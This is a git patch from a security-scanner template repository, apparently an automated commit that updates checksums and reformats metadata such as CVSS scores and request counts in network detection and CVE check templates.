+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7053,90 +7053,90 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b
 http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b
 http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274
 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794
-network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f
-network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232
-network/cves/2001/CVE-2001-1473.yaml:4145fb7f555bfac7ccca007a9fb5852758e106f2
-network/cves/2011/CVE-2011-2523.yaml:4ccb3e295a9d1767f6cbcb9a002612925bd6a515
-network/cves/2015/CVE-2015-3306.yaml:3c84863be8c2479425260df77377099bb9fd9478
-network/cves/2016/CVE-2016-2004.yaml:06a7c58f1150be1ce743ede2cf57f09379479ae2
-network/cves/2016/CVE-2016-3510.yaml:2850b8cede8767d64635c87818c2dbeaa0c12f12
-network/cves/2017/CVE-2017-3881.yaml:5a1798099302282f684b4e45404fee4eb239b5a8
-network/cves/2017/CVE-2017-5645.yaml:912a3a77c286cf1cfaa14bc57eb0be80419393c0
+network/backdoor/backdoored-zte.yaml:f2404c7da8bc8f4a0f44c9a98c954a0b70b6a6ca
+network/backdoor/vsftpd-backdoor.yaml:be584f958ad40909f5fd12048c1c70840e5b55fd
+network/cves/2001/CVE-2001-1473.yaml:3533c4dd73e57282133423457b202f16ce6b8dac
+network/cves/2011/CVE-2011-2523.yaml:827f6785ecdf7e6e387253450f502995bc2cf5c3
+network/cves/2015/CVE-2015-3306.yaml:55a8f518a54a533a10b30e3bd93ba1039bdb1f0e
+network/cves/2016/CVE-2016-2004.yaml:eaeffebb559fa76744fd7fd1b779b5e5521dbeb0
+network/cves/2016/CVE-2016-3510.yaml:ab649b2bd1a9eda70cb43d600b6320c45f01806e
+network/cves/2017/CVE-2017-3881.yaml:b97e5e80d981cb76446c857d349e7d3fb63bd9a9
+network/cves/2017/CVE-2017-5645.yaml:385b1455ebbddb6136054cd2886c87f50818135d
 network/cves/2018/CVE-2018-2628.yaml:f823ce8c5d0f0f9947a5131c6fe61f0edd98ad0d
-network/cves/2018/CVE-2018-2893.yaml:0747425f4e3eb128e08736b1aaca8872266c580d
-network/cves/2020/CVE-2020-11981.yaml:6797dad5754668382eb920b2ac5c294da9398fa2
-network/cves/2020/CVE-2020-1938.yaml:87d1735c3efbd037c2c0669e4d6ef6d195858d12
-network/cves/2020/CVE-2020-7247.yaml:fc45c678e38dc35825a377e30e8ef66b9360c660
-network/cves/2021/CVE-2021-44521.yaml:40361b30bb6231972a24076b80cdb0ed85b05279
-network/cves/2022/CVE-2022-0543.yaml:a27a67b45dfceaef860fd6c59bd22394145882cb
-network/cves/2022/CVE-2022-24706.yaml:4a036736022e99e18a148bd86a3894d95b151084
+network/cves/2018/CVE-2018-2893.yaml:99800642b6815c2ddd46dbdac4c51206b467271e
+network/cves/2020/CVE-2020-11981.yaml:d73e69b51496835f55e58fabb67992aa6635203c
+network/cves/2020/CVE-2020-1938.yaml:887bd58e985526a366f67962db239a627e9e5181
+network/cves/2020/CVE-2020-7247.yaml:9ed3065e9ee6c3f121fe08a6117d586ff352eb8c
+network/cves/2021/CVE-2021-44521.yaml:2cc6438637f42c0e34ecc68f2459b050ededd971
+network/cves/2022/CVE-2022-0543.yaml:c9f0f01774372aae54622c97b9a68ce5997cc3b2
+network/cves/2022/CVE-2022-24706.yaml:3fcf75994b8852f37271048b9af452f602c79a95
 network/cves/2022/CVE-2022-31793.yaml:ac870c80a1d17e215fc1357d257cdd07f2aca8da
-network/cves/2023/CVE-2023-33246.yaml:cd9f687e6cb2d556fcf07482f242a3703180d023
-network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829
-network/default-login/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0
-network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790
-network/detection/activemq-openwire-transport-detect.yaml:5341048ef6135611d6586414227704e61bf710eb
-network/detection/apache-activemq-detect.yaml:96a3df34ded2f9707a536d0fc05eb0d7414749d2
-network/detection/axigen-mail-server-detect.yaml:f1316025d891e64008612574e3fd895bb7aca99f
-network/detection/cisco-finger-detect.yaml:b276bbcf3d47e682f18155685150f07cedf698e5
-network/detection/clamav-detect.yaml:f856880b2fbc4d968e3bb45782c200277487e441
-network/detection/cql-native-transport.yaml:3d6e54aa9773e16aa2e9c75f61462bf1d45a8205
-network/detection/detect-addpac-voip-gateway.yaml:25eca59ccaf9984df28dd1c01dd4d58c67c23dfd
-network/detection/detect-jabber-xmpp.yaml:8aa9448785a0dc82118ffc8b9af51e928cd60c60
-network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c
-network/detection/dropbear-cbc-ciphers.yaml:c9e37bbd3d8025d202c9871620fcf07ec5f3f389
-network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a
-network/detection/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78
-network/detection/finger-detect.yaml:b633bc4e54f3cf5421cf90d17d607d502db8a6e5
-network/detection/gnu-inetutils-ftpd-detect.yaml:13032bebe217b19d1069ebb90b8855ad019fda28
-network/detection/gopher-detect.yaml:63356156c5578e594b630bc0e7b341ca2e12a30c
-network/detection/ibm-d2b-database-server.yaml:7532b5b14424f0bfdeeac34f2883d1e958da3b3c
-network/detection/imap-detect.yaml:792e8e90cc05dd94184c7e2e584f55a2e9d0d253
-network/detection/iplanet-imap-detect.yaml:797804466967f502f94cb46f786ea756640df995
+network/cves/2023/CVE-2023-33246.yaml:31795e9d41202a88961af586a1d947fa60d90246
+network/default-login/ftp-anonymous-login.yaml:20a6c899ab3d67d5e178c0d167d8fce637945c1a
+network/default-login/ftp-weak-credentials.yaml:40ce5a09aff1c80a461d2acebb8cb3816bda9779
+network/default-login/ldap-anonymous-login.yaml:5ceeb7c64897a0469e3b9e5a2ec925567c0a8925
+network/detection/activemq-openwire-transport-detect.yaml:a2a7d1d1be98ebc53229cce7b9a75e0aefc516b2
+network/detection/apache-activemq-detect.yaml:15b56708cf6d6f8dca783cb40b6d3f9b1ffb765d
+network/detection/axigen-mail-server-detect.yaml:658eaaf7b6ae1a881862207802800b3052d0324d
+network/detection/cisco-finger-detect.yaml:b242374a1df790541b766f4f0e36666a2a7549c5
+network/detection/clamav-detect.yaml:8616e250aa69c74ff903919b6cff28a77c4ae075
+network/detection/cql-native-transport.yaml:ccd025169c99c719b79d13cf8b72a58559321a07
+network/detection/detect-addpac-voip-gateway.yaml:86931a2b160f7ffb63386c2add91b28f91648595
+network/detection/detect-jabber-xmpp.yaml:94388107835fcf3923fb0151ff02b4b9a35d829c
+network/detection/dotnet-remoting-service-detect.yaml:ecae3ec87ce7d816448d05a5b611fcc4ce248407
+network/detection/dropbear-cbc-ciphers.yaml:896bdca3f90b65c9c6013438d67eb8c95389f6d8
+network/detection/esmtp-detect.yaml:470b3c4eecbc6946f1af9755fb0e934d91e2ab86
+network/detection/expn-mail-detect.yaml:e10d98af34370bdc982563d1878f8f558e197ecf
+network/detection/finger-detect.yaml:eab8109135becb245495b39e84f6123721586bfd
+network/detection/gnu-inetutils-ftpd-detect.yaml:c2e348774b35f11a845bcb7c2a726df335749b80
+network/detection/gopher-detect.yaml:3901b4cf94fbb3661b0aeb904a38f3f6b8194c80
+network/detection/ibm-d2b-database-server.yaml:9c219e670702e3369473a0c68fafbc8d75a87ab0
+network/detection/imap-detect.yaml:711c3da60996bbd7175b494caabb90523febbca4
+network/detection/iplanet-imap-detect.yaml:6252d0cd1de590c9de0ee8ac5bf9968d45b1234e
 network/detection/java-rmi-detect.yaml:d724183dc184431e03ed5c8274421665c7bda989
-network/detection/microsoft-ftp-service.yaml:92b1c3349e9f029e476f9d13798797fc45906ee4
-network/detection/mikrotik-ftp-server-detect.yaml:c43d32e0437d4e6b1188ad7fdce3ab17d4329938
-network/detection/mikrotik-routeros-api.yaml:cabbd4773b4fe9287d47cc42ea78d30c9562f1e3
-network/detection/mongodb-detect.yaml:2c765e6540b259f964bb53cb01ff81a64c80a78b
-network/detection/msmq-detect.yaml:5d977a358a7a5bbc1837ce60bdc31af7df92d59b
-network/detection/mysql-detect.yaml:4c716a0a7a60b45626cd756a2c949ca9e31439cb
-network/detection/openssh-detect.yaml:84efaa8f67216536f0e879a983157f364c0c27de
-network/detection/pgsql-detect.yaml:2d8931b96bf60405c27040a2b26fb8402ab524f9
-network/detection/pop3-detect.yaml:63f7b18a6aa15bf1ebb13c26a094c48b3607a203
-network/detection/proftpd-server-detect.yaml:0364267073c68f8c76a58c785b7295b7101aa87c
-network/detection/rabbitmq-detect.yaml:4ea11fe71f516437ee18948bef434aafc57eca62
-network/detection/rdp-detect.yaml:eed3037c8e3caf6e57e40d767f2456e423e91384
-network/detection/redis-detect.yaml:55fb1ac0ec017cc8870f1ca389ba3e9284c414ce
-network/detection/riak-detect.yaml:73cddd9093f8e8526acc0d9b9b5457306749ec34
-network/detection/rpcbind-portmapper-detect.yaml:64093f99eb18abeb9a85721e6a44b3a4d26d57e3
-network/detection/rsyncd-service-detect.yaml:5c3f80f8c0e34c9273c639b5083f044f1e16a5ea
-network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c
-network/detection/samba-detect.yaml:f9f2fdf3001bac13094a48958b3a32489d46564b
-network/detection/sap-router.yaml:4d28d97202f3fdfa85d69a06b008d13ebd1e697c
-network/detection/smb-detect.yaml:5e42e55f8f85322f4db93767ab90a895db57f76c
-network/detection/smtp-detect.yaml:c059ef31c5bb6b3ecbff0fbe5e8283344b29ac27
-network/detection/sshd-dropbear-detect.yaml:7c972bdaa3dfbcd1173e3374998ff874f13d2da7
-network/detection/starttls-mail-detect.yaml:66fc7ae7adabd5060d46c12e42a1cab23d1ea933
-network/detection/teamspeak3-detect.yaml:cad767eb30c1407e7d8978102f7294b48f004378
-network/detection/telnet-detect.yaml:42d2d700d5d2505efe90dad20055132528312f13
-network/detection/totemomail-smtp-detect.yaml:59d077ac0097a20fd58a5cf017d54fd7481f278c
-network/detection/vmware-authentication-daemon-detect.yaml:81fe7f8be7c047f43a06b421b8d6ef1b97e25e50
-network/detection/vnc-service-detect.yaml:75bdf9c29f7666004c92b3f7183dec085e8126df
+network/detection/microsoft-ftp-service.yaml:e50fb87b704d9e1afca92335bff43102192c4ea4
+network/detection/mikrotik-ftp-server-detect.yaml:a044ce5ddf8d1511272d3be61e2a6ac1fae65dd9
+network/detection/mikrotik-routeros-api.yaml:39f157753ce8be7239d12494e5f7b458f79cf347
+network/detection/mongodb-detect.yaml:f2d353e05a121675c34ad57d7b75888342b2fa24
+network/detection/msmq-detect.yaml:4c3895d1a669b762a75ad31aac269090c48a55bf
+network/detection/mysql-detect.yaml:e1bc919065aa2b6272dae784d33d77e0733757c8
+network/detection/openssh-detect.yaml:e4e89cbf2e5603105b2c106259ee6ed3ea5e907e
+network/detection/pgsql-detect.yaml:b71235f0e0a89752d8a6529cfb2f6df7ac4dcec7
+network/detection/pop3-detect.yaml:4dfb3a5e10ac41f9d08912ce25e5895512f348a2
+network/detection/proftpd-server-detect.yaml:f8e31581df48389c3cdadcd7a1ed6d35adbe2099
+network/detection/rabbitmq-detect.yaml:69219a94f9425ecf96ee9e9678711cfcbd87b797
+network/detection/rdp-detect.yaml:86666e40065620d31395570f8d80e6adbe4dde3e
+network/detection/redis-detect.yaml:7ef522d24e9e0914ff5367bc5fa42d1b46323fa4
+network/detection/riak-detect.yaml:547e4a1204dc2fde23d40e1bc162ab2a161bebc0
+network/detection/rpcbind-portmapper-detect.yaml:e81701b944f44e94cbe6f82e2c3ba4f71c3cb28c
+network/detection/rsyncd-service-detect.yaml:007ce06c7619746977e4d4aacdb505397ff54376
+network/detection/rtsp-detect.yaml:41b325b0bedc536f795d5b108eab0809b5fb7645
+network/detection/samba-detect.yaml:1d01568e7fc2462ce96c515723afe281f5894171
+network/detection/sap-router.yaml:4f748f58cf50d3a389217e892eb7d8c9eed4c064
+network/detection/smb-detect.yaml:b0c061673b26b5a60fa6f2e0eb20de37c08ba66b
+network/detection/smtp-detect.yaml:4cb698e3aef0566a80be0f15ad73d05d98dcc2f5
+network/detection/sshd-dropbear-detect.yaml:dc663f0b684b4c5a0443171ac324a65e88a91353
+network/detection/starttls-mail-detect.yaml:76b6099c08373bc8c49dc0bf4a67ee8598c7811b
+network/detection/teamspeak3-detect.yaml:db3d1ee5ab40f3d460f4463329ab757152df6aa1
+network/detection/telnet-detect.yaml:8fbcde5667ca617d7e35844cc4573fc806470eb6
+network/detection/totemomail-smtp-detect.yaml:67399b872a46c4042a6d7cc2242fbda598fe80e1
+network/detection/vmware-authentication-daemon-detect.yaml:c3200055ad0072a42b7c7e67374d348f236b2ded
+network/detection/vnc-service-detect.yaml:fe0054cc1b77b69404d2f446676403f252b82b98
 network/detection/weblogic-iiop-detect.yaml:94b8c1aaec6ffabca45c86cfb25b3a609e30bdfe
 network/detection/weblogic-t3-detect.yaml:ce204c445556d0e1e07af1f6aaa65ee9c817d252
-network/detection/xlight-ftp-service-detect.yaml:709c4f6625b56fb99b25ba9992167c48b44a107d
-network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de
-network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943
-network/enumeration/mongodb-info-enum.yaml:137dd278383c71d517fc341a852fb786ace9daad
-network/enumeration/niagara-fox-info-enum.yaml:4d28582676b275af6cadc3bc63ad5ba278bcf856
-network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0
-network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42
-network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43
-network/exposures/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1
-network/exposures/exposed-adb.yaml:51e6daeb3e5bed63b7d45f37e037e67e971adf16
-network/exposures/exposed-dockerd.yaml:0fbaae44d57f346911a4ebca079bcf165b8a4c85
-network/exposures/exposed-redis.yaml:e9480d8e9207c6e5933482cfcff732a8abb8b3a0
-network/exposures/exposed-zookeeper.yaml:44b26aa0b0b3bc628ff494ed455edd6043732d2a
+network/detection/xlight-ftp-service-detect.yaml:df09822d9cc6fa1b1e4f7f99bbacfc9c24160159
+network/enumeration/beanstalk-service.yaml:6b761f32a18de725b06376576ad12d85a4ebf832
+network/enumeration/kafka-topics-list.yaml:c90f512f4ec006edc4c6986c0728015fa8525358
+network/enumeration/mongodb-info-enum.yaml:b77a072348b1dacf4f8d530063fd1e5f47cfea3a
+network/enumeration/niagara-fox-info-enum.yaml:cd3fc20375db89c116c2c5dcb82e970c0ab3a73e
+network/enumeration/psql-user-enum.yaml:c4c232dd301986d3c29e04e06748f57438fb1e0e
+network/enumeration/smtp/smtp-user-enum.yaml:1d4749091fccd1b9fa25ee8b09f34c3b51592152
+network/enumeration/smtp-commands-enum.yaml:e28d80b6ecb2e283d43f58f74e3d1ba6c63455fb
+network/exposures/cisco-smi-exposure.yaml:c760fcd32e21fc17283ed9a02c09a571a3680f29
+network/exposures/exposed-adb.yaml:52627ae57853ac9a610d3e789905bd2c557d9de4
+network/exposures/exposed-dockerd.yaml:a690f5be8036ac62769b004e1354f6638fcaa87b
+network/exposures/exposed-redis.yaml:3887effd170b1f500a92bd2725b325d4d6b3ce05
+network/exposures/exposed-zookeeper.yaml:1b4fc1c2c6a2131c33a293a4655c4e0d3f4fe6b0
 network/jarm/c2/cobalt-strike-c2-jarm.yaml:7bf85725d77f35262ff24b7678adc4461404b92e
 network/jarm/c2/covenant-c2-jarm.yaml:71fe7c9b7f6f7fbef263204bf701a6a5a513eb1f
 network/jarm/c2/deimos-c2-jarm.yaml:bcbf9501f84caefd8c9385a3575a3fb6c2fd4ce2
@@ -7153,22 +7153,22 @@ network/jarm/c2/posh-c2-jarm.yaml:06aa7bbb8f3cd637fde301b7eac9c83b68467f0c
 network/jarm/c2/shad0w-c2-jarm.yaml:21d654db72d9fbefa32a7ec40d4a77616aa4a43a
 network/jarm/c2/silenttrinity-c2-jarm.yaml:fdec712cc69eed900b0d7ba42187a0ea0e7bb95b
 network/jarm/c2/sliver-c2-jarm.yaml:dd41a2f23026cb1ce6fab8fb12f3e4a82a2accc3
-network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353
-network/misconfig/apache-rocketmq-broker-unauth.yaml:d9cfd62b876feabd3952ddc4eaa6c996eb4876bc
-network/misconfig/clamav-unauth.yaml:559dfa23076118f5ce1d84ffd9a76efb5d1d4422
-network/misconfig/clickhouse-unauth.yaml:c47517fbfc5f4a0425f884c42ef218e776b92cbc
-network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6
-network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024
-network/misconfig/ganglia-xml-grid-monitor.yaml:62649538ea72479f23f8f454790b21388b8f56b6
-network/misconfig/memcached-stats.yaml:1d54fbf17762442553b9c16d16bf2776a42aa2b9
-network/misconfig/mongodb-unauth.yaml:2fd6f2959bb97ab660377dcfad6e9db4559b605e
-network/misconfig/mysql-native-password.yaml:ef8676ebf814fe1084e81eeaf9bf70b999ff8b45
-network/misconfig/printers-info-leak.yaml:cb6c13a840a2765acf43726c754aa243b0101199
-network/misconfig/sap-router-info-leak.yaml:008df0e634639e012bd67b242172b20d93b92630
-network/misconfig/tidb-native-password.yaml:ee468366b1737d416807ecb51feae7b35ed27a4f
-network/misconfig/tidb-unauth.yaml:98ce03032751882e00f5ea0880511d5aa356de74
-network/misconfig/unauth-psql.yaml:c54c9c89d460a71bc82267bd5737dbde45e53122
-network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2
+network/misconfig/apache-dubbo-unauth.yaml:9fc2673de80d24caa065664242dfbd2eb1392eb4
+network/misconfig/apache-rocketmq-broker-unauth.yaml:aec4738a8ac3af859878ab933b173856d6c2be54
+network/misconfig/clamav-unauth.yaml:20adfce3848329dbb83e8f18a1e17ad8767f8ab8
+network/misconfig/clickhouse-unauth.yaml:4d0e9f50cdf7d2241db5ee84b8ccb207a46230c8
+network/misconfig/dropbear-weakalgo.yaml:27cdaa70b7fe79843b983b161e1fad88288a373b
+network/misconfig/dropbear-weakmac.yaml:760914a845a37654688bae793af4a4201c389482
+network/misconfig/ganglia-xml-grid-monitor.yaml:fc9b7c0872ffc3a33b0f680e53c0e1f74fb15544
+network/misconfig/memcached-stats.yaml:29b5e7465487bcd2328367ddc9c57ae4b30abafc
+network/misconfig/mongodb-unauth.yaml:1f53455484d54404a99989dd24d6c625018db29d
+network/misconfig/mysql-native-password.yaml:dc73cd03694628961e4c23e897004316f93d0437
+network/misconfig/printers-info-leak.yaml:e2db9eb3ecff671c0c3f68f0d150e4970895c0ed
+network/misconfig/sap-router-info-leak.yaml:ad7ae897ff318aa35b5191b6950022c9b17013ee
+network/misconfig/tidb-native-password.yaml:5a201045c715852806eb2f11c2d7320f428fd104
+network/misconfig/tidb-unauth.yaml:a2ae3b64fb37d676ab8343b68c77f98c0855997b
+network/misconfig/unauth-psql.yaml:eed9adc5419a909329f6f49eca32a1a1455963ee
+network/vulnerabilities/clockwatch-enterprise-rce.yaml:eb8bd907db57a3f2c47999d0bc026d17550f4e0c
 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55
 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a
 ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541
@@ -7195,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:61d84a877ff8fcbfad8135b36533649bd26beddd
+templates-checksum.txt:3fa9d3f4155f376df13f89495d8c7b190ad97a68
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 627e654d30ee2e63b524e085222a4e429ebf6d21 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 13:29:58 +0000
Subject: [PATCH 0563/1090] TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023]
 :robot:

---
 network/backdoor/backdoored-zte.yaml          |  6 ++---
 network/backdoor/vsftpd-backdoor.yaml         |  8 +++----
 network/cves/2001/CVE-2001-1473.yaml          |  8 +++----
 network/cves/2015/CVE-2015-3306.yaml          |  8 +++----
 network/cves/2016/CVE-2016-2004.yaml          | 10 ++++-----
 network/cves/2016/CVE-2016-3510.yaml          |  4 ++--
 network/cves/2017/CVE-2017-3881.yaml          |  8 +++----
 network/cves/2017/CVE-2017-5645.yaml          | 10 ++++-----
 network/cves/2018/CVE-2018-2893.yaml          |  4 ++--
 network/cves/2020/CVE-2020-11981.yaml         |  4 ++--
 network/cves/2020/CVE-2020-1938.yaml          |  8 +++----
 network/cves/2020/CVE-2020-7247.yaml          |  8 +++----
 network/cves/2021/CVE-2021-44521.yaml         |  8 +++----
 network/cves/2022/CVE-2022-0543.yaml          |  8 +++----
 network/cves/2022/CVE-2022-24706.yaml         | 12 +++++-----
 network/cves/2023/CVE-2023-33246.yaml         | 12 +++++-----
 .../default-login/ftp-anonymous-login.yaml    |  8 +++----
 .../default-login/ftp-weak-credentials.yaml   |  6 ++---
 .../default-login/ldap-anonymous-login.yaml   |  4 ++--
 .../activemq-openwire-transport-detect.yaml   |  4 ++--
 network/detection/apache-activemq-detect.yaml |  4 ++--
 .../detection/axigen-mail-server-detect.yaml  |  4 ++--
 network/detection/cisco-finger-detect.yaml    |  4 ++--
 network/detection/clamav-detect.yaml          |  4 ++--
 network/detection/cql-native-transport.yaml   |  4 ++--
 .../detection/detect-addpac-voip-gateway.yaml |  5 ++---
 network/detection/detect-jabber-xmpp.yaml     |  5 ++---
 .../dotnet-remoting-service-detect.yaml       |  5 ++---
 network/detection/dropbear-cbc-ciphers.yaml   |  8 +++----
 network/detection/esmtp-detect.yaml           |  5 ++---
 network/detection/expn-mail-detect.yaml       |  4 ++--
 network/detection/finger-detect.yaml          |  4 ++--
 .../detection/gnu-inetutils-ftpd-detect.yaml  |  4 ++--
 network/detection/gopher-detect.yaml          |  5 ++---
 .../detection/ibm-d2b-database-server.yaml    |  5 ++---
 network/detection/imap-detect.yaml            |  5 ++---
 network/detection/iplanet-imap-detect.yaml    |  3 +--
 network/detection/microsoft-ftp-service.yaml  |  4 ++--
 .../detection/mikrotik-ftp-server-detect.yaml |  4 ++--
 network/detection/mikrotik-routeros-api.yaml  |  5 ++---
 network/detection/mongodb-detect.yaml         | 11 +++++-----
 network/detection/msmq-detect.yaml            |  6 ++---
 network/detection/mysql-detect.yaml           |  5 ++---
 network/detection/openssh-detect.yaml         | 11 +++++-----
 network/detection/pgsql-detect.yaml           |  5 ++---
 network/detection/pop3-detect.yaml            |  5 ++---
 network/detection/proftpd-server-detect.yaml  |  4 ++--
 network/detection/rabbitmq-detect.yaml        |  4 ++--
 network/detection/rdp-detect.yaml             |  3 +--
 network/detection/redis-detect.yaml           |  2 +-
 network/detection/riak-detect.yaml            |  4 ++--
 .../detection/rpcbind-portmapper-detect.yaml  |  5 ++---
 network/detection/rsyncd-service-detect.yaml  |  5 ++---
 network/detection/rtsp-detect.yaml            |  5 ++---
 network/detection/samba-detect.yaml           |  6 ++---
 network/detection/sap-router.yaml             |  4 ++--
 network/detection/smb-detect.yaml             |  4 ++--
 network/detection/smtp-detect.yaml            |  4 ++--
 network/detection/sshd-dropbear-detect.yaml   |  4 ++--
 network/detection/starttls-mail-detect.yaml   |  4 ++--
 network/detection/teamspeak3-detect.yaml      | 22 +++++++++----------
 network/detection/telnet-detect.yaml          |  4 ++--
 network/detection/totemomail-smtp-detect.yaml |  4 ++--
 .../vmware-authentication-daemon-detect.yaml  |  4 ++--
 network/detection/vnc-service-detect.yaml     |  4 ++--
 .../detection/xlight-ftp-service-detect.yaml  |  4 ++--
 network/enumeration/mongodb-info-enum.yaml    |  5 ++---
 .../enumeration/niagara-fox-info-enum.yaml    |  8 +++----
 network/enumeration/psql-user-enum.yaml       |  2 +-
 network/enumeration/smtp-commands-enum.yaml   |  4 ++--
 network/enumeration/smtp/smtp-user-enum.yaml  |  2 +-
 network/exposures/cisco-smi-exposure.yaml     |  4 ++--
 network/exposures/exposed-adb.yaml            |  4 ++--
 network/exposures/exposed-dockerd.yaml        |  4 ++--
 network/exposures/exposed-redis.yaml          |  2 +-
 network/exposures/exposed-zookeeper.yaml      |  4 ++--
 network/misconfig/apache-dubbo-unauth.yaml    |  2 +-
 .../apache-rocketmq-broker-unauth.yaml        |  2 +-
 network/misconfig/clamav-unauth.yaml          |  8 +++----
 network/misconfig/clickhouse-unauth.yaml      |  4 ++--
 network/misconfig/dropbear-weakalgo.yaml      |  8 +++----
 network/misconfig/dropbear-weakmac.yaml       |  8 +++----
 .../misconfig/ganglia-xml-grid-monitor.yaml   |  4 ++--
 network/misconfig/memcached-stats.yaml        |  4 ++--
 network/misconfig/mongodb-unauth.yaml         |  4 ++--
 network/misconfig/mysql-native-password.yaml  |  5 ++---
 network/misconfig/sap-router-info-leak.yaml   |  4 ++--
 network/misconfig/tidb-native-password.yaml   |  4 ++--
 network/misconfig/tidb-unauth.yaml            |  2 +-
 network/misconfig/unauth-psql.yaml            |  2 +-
 .../clockwatch-enterprise-rce.yaml            |  6 ++---
 91 files changed, 234 insertions(+), 254 deletions(-)

diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
index d9ffb84282..fe8cf86de6 100644
--- a/network/backdoor/backdoored-zte.yaml
+++ b/network/backdoor/backdoored-zte.yaml
@@ -10,12 +10,12 @@ info:
     - https://www.exploit-db.com/ghdb/7179
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cwe-id: CWE-912
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: http.html:"ZTE Corporation"
+    verified: true
   tags: edb,network,zte,telnet,backdoor,router
 
 tcp:
diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml
index 764d4921c5..953a380eb8 100644
--- a/network/backdoor/vsftpd-backdoor.yaml
+++ b/network/backdoor/vsftpd-backdoor.yaml
@@ -7,14 +7,14 @@ info:
